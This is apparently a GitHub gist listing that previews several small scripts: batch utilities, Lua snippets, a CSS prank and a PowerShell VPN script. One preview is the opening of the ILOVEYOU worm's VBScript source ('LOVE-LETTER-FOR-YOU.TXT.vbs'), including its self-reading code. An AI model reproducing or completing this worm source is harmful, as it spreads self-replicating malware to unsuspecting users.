View robloxpath.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
for /F "skip=2 tokens=3*" %%A in ('reg query "HKCU\Software\ROBLOX Corporation\Environments\roblox-player" /ve') DO (set robloxpath=%%A) | |
setlocal DisableDelayedExpansion | |
set splitter=\RobloxPlayerLauncher.exe | |
setlocal EnableDelayedExpansion | |
set LF=^ | |
rem ** Two empty lines are required |
View taskkiller.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
set args=%* | |
if [%args%] EQU [] ( | |
tasklist | |
set /p args=Taskname to kill:^ | |
) | |
taskkill /f /im %args% |
View unc.lua
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if package.config:sub(1,1) == '\\' then os.exit(print('unc: !: the windows version of the un-c compiler isn\'t implemented (yet)')) end -- Linux and macOS users only | |
function starts_with(str, start) | |
return start == false or str:sub(1, #start) == start | |
end | |
function ends_with(str, ending) | |
return ending == false or str:sub(-#ending) == ending | |
end |
View APLIAFCLDTCITAMPAC.lua
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
valid_string = 'A programming language is any set of rules that converts strings, or graphical program elements in the case of visual programming languages, to various kinds of machine code output.' | |
function file_exists(file) | |
local f = io.open(file, 'rb') | |
if f then f:close() end | |
return f ~= nil | |
end | |
function parse(command) | |
if command == valid_string then |
View LOVE-LETTER-FOR-YOU.TXT.vbs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rem barok -loveletter(vbe) <i hate go to school> | |
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines | |
On Error Resume Next | |
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow | |
eq="" | |
ctr=0 | |
Set fso = CreateObject("Scripting.FileSystemObject") | |
set file = fso.OpenTextFile(WScript.ScriptFullname,1) | |
vbscopy=file.ReadAll | |
main() |
View flippingpage.css
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*credits: https://stackoverflow.com/a/14194532/17023061*/ body { -moz-transform: scaleX(-1); -o-transform: scaleX(-1); -webkit-transform: scaleX(-1); transform: scaleX(-1); filter: FlipH; -ms-filter: "FlipH"; } |
View Vichy's GitHub Stats
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
⭐ Total Stars: 0 | |
➕ Total Commits: 109 | |
🔀 Total PRs: 26 | |
🚩 Total Issues: 12 | |
📦 Contributed to: 23 |
View CreateSystemVPN.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# (a fork of https://gist.github.com/bytespec/862c8f370d6018c76d6122ca423c16cf) | |
# Parameter defaults | |
param( | |
[Parameter()] | |
[String]$VPN_NAME = 0 | |
[String]$SERVER = 0 | |
[String]$SPLIT = $false | |
[String[]]$ROUTES = 0 # Empty or set $SPLIT to false to disable tunneling | |
[String]$USER = 0 |
View reexplorer.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
echo [+] Restarting explorer.exe... | |
taskkill /f /im explorer.exe >nul | |
timeout 2 >nul | |
start %systemroot%\explorer.exe | |
echo [+] Starting explorer.exe... | |
set /p _p= |
NewerOlder